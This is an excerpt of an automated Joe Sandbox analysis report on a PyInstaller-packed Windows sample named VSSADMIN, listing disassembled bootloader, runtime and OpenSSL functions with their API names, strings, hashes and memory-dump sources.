                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                      • API String ID: 4998090-2855260032
                                                                                                                                                                      • Opcode ID: 76bb3550803a78cfa8e176607768f7e16a77bb2e97f93ab652bde795ceb62436
                                                                                                                                                                      • Instruction ID: d6865ce8e8da8e6b9fc4ba81797bd2e0a7ba25aab07dd6370f01fbdfa9e29f00
                                                                                                                                                                      • Opcode Fuzzy Hash: 76bb3550803a78cfa8e176607768f7e16a77bb2e97f93ab652bde795ceb62436
                                                                                                                                                                      • Instruction Fuzzy Hash: CF41AF3161DE8692EB109F64E4846AA7371FB86BB5F401232EA9E876D5DF3DE404C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF32B0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
                                                                                                                                                                      • API String ID: 3568877910-1596076588
                                                                                                                                                                      • Opcode ID: 7fedaee5a43b9f96133ba3337b9998908fec395ca8a45f4228c1692c16d9240c
                                                                                                                                                                      • Instruction ID: 1bfa46f2e54ce71a7e4e031d5e60bc146e057128f2cf9cafb53a837b057d3d39
                                                                                                                                                                      • Opcode Fuzzy Hash: 7fedaee5a43b9f96133ba3337b9998908fec395ca8a45f4228c1692c16d9240c
                                                                                                                                                                      • Instruction Fuzzy Hash: 1851C1A2B1C70F96EA0DAB22A4346B93390BF94B84F440532EF4E07791DE3CE405E790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C72030 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                      • String ID: P%
                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                      • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                                                                      • Instruction ID: 6a098fbf13fc729f86e8d03fb4107a33b8e2e945738758404f7dd677c4b02f99
                                                                                                                                                                      • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                                                                      • Instruction Fuzzy Hash: 33510426608BA187DA349F26E4581BAB7B1FB98B65F004122EBCF83684DF3DD045DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C774E0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00007FF614C7269E,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C77507
                                                                                                                                                                      • FormatMessageW.KERNEL32 ref: 00007FF614C77536
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 00007FF614C7758C
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                      • API String ID: 2920928814-3505189403
                                                                                                                                                                      • Opcode ID: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
                                                                                                                                                                      • Instruction ID: 9e498f8d3759ac16d0be59944cde15ce73329b611ef7225304972c15ac2f5965
                                                                                                                                                                      • Opcode Fuzzy Hash: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
                                                                                                                                                                      • Instruction Fuzzy Hash: DE217F31A0CE4792EB609B14E8C42B672B5FB4ABA9F844037E54EC36A4EF7DE505C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C80258 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                      • Opcode ID: fa9940231bde350a5f98b79da4d3c21430d5b5273eb9d997a56d31e660f397a8
                                                                                                                                                                      • Instruction ID: aece6c676b0adb97a7f5f1c0a70427e95a1acb329a6bcbdebd219e3f3b4a6242
                                                                                                                                                                      • Opcode Fuzzy Hash: fa9940231bde350a5f98b79da4d3c21430d5b5273eb9d997a56d31e660f397a8
                                                                                                                                                                      • Instruction Fuzzy Hash: 2612B4B2E0C94786FB205B16E0946BA7271FB82F64F864137D699876C4DF3CE480EB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF41DD Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastsetsockopt
                                                                                                                                                                      • String ID: ..\s\crypto\bio\b_sock2.c$o
                                                                                                                                                                      • API String ID: 1729277954-1872632005
                                                                                                                                                                      • Opcode ID: f8faf1672888dd055ca767ddbd6e928684f186272bd270f584dbc43e0a9459f0
                                                                                                                                                                      • Instruction ID: 2049cb3ea675b4e09d3d628cbc6b0bc2dff37a87f4e90fe33d1c4d9a66bbea25
                                                                                                                                                                      • Opcode Fuzzy Hash: f8faf1672888dd055ca767ddbd6e928684f186272bd270f584dbc43e0a9459f0
                                                                                                                                                                      • Instruction Fuzzy Hash: 0951E472B0C60A86F728CF61E4606AD7760FB85B44F440135EB9C07A89CF7EE909EB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF23D3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                                                                                                                                                      • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                      • API String ID: 1944374717-1672312481
                                                                                                                                                                      • Opcode ID: 79db5ee4ce9dc6ccf9bd915a9b468d2fbd35849815718b4b7a41fc8616343fad
                                                                                                                                                                      • Instruction ID: 8d613fdc3780b9378d4cdf8c6acece3c9c35ccd622a431098a78a8e3a21c2799
                                                                                                                                                                      • Opcode Fuzzy Hash: 79db5ee4ce9dc6ccf9bd915a9b468d2fbd35849815718b4b7a41fc8616343fad
                                                                                                                                                                      • Instruction Fuzzy Hash: 92415262705B8A86EB689F24E8A06AD33A0EF447B4B544735EB7D477E4DF2CE544A300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77000 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                      • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                      • API String ID: 2895956056-3524285272
                                                                                                                                                                      • Opcode ID: 70482ae767ba9e09b517fd1531fb7070f55263243fe81ec667caeea18f8722ee
                                                                                                                                                                      • Instruction ID: d17c6e390d7880e1e4280f2270b8cece3af06fd1a86c0da9f8a39eadcb78234b
                                                                                                                                                                      • Opcode Fuzzy Hash: 70482ae767ba9e09b517fd1531fb7070f55263243fe81ec667caeea18f8722ee
                                                                                                                                                                      • Instruction Fuzzy Hash: C7411232A0CB8292DA209B64F4952AAB3B4FB96774F500336E6AD877D5DF7CD0448B40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7DC60 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                      • Opcode ID: 532212c89bb1048218e5790bfeb27ca173c8f1a64766d63ee7945c9f393af580
                                                                                                                                                                      • Instruction ID: e6db290d1871e006f48daed5d6a3a2ad39328485cda6319e717c874abdb35841
                                                                                                                                                                      • Opcode Fuzzy Hash: 532212c89bb1048218e5790bfeb27ca173c8f1a64766d63ee7945c9f393af580
                                                                                                                                                                      • Instruction Fuzzy Hash: BCE16F73A0CB4187EB209B65D4802AD77B0FB56BA9F104136EE4D97B55CF38E491C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8DDE8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00000000,?,00007FF614C8E182,?,?,0000014C6ACFB978,00007FF614C8A253,?,?,?,00007FF614C8A14A,?,?,?,00007FF614C854A2), ref: 00007FF614C8DF64
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000,?,00007FF614C8E182,?,?,0000014C6ACFB978,00007FF614C8A253,?,?,?,00007FF614C8A14A,?,?,?,00007FF614C854A2), ref: 00007FF614C8DF70
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                      • Opcode ID: d43daa0ff16dd51341f533a9afc7daaaef1b639a0d72f502c137a615a6bfef50
                                                                                                                                                                      • Instruction ID: 9faa76ad0f9db54a2a93986ea945017a36405945ec8f955a11fa8faa09d66ba8
                                                                                                                                                                      • Opcode Fuzzy Hash: d43daa0ff16dd51341f533a9afc7daaaef1b639a0d72f502c137a615a6bfef50
                                                                                                                                                                      • Instruction Fuzzy Hash: C941E471B19E1392FA15CB16A8805B522B2BF46FB0F084137DD0EC7798EE3DE846A344
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77630 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 103COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C776CF
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C7771F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide
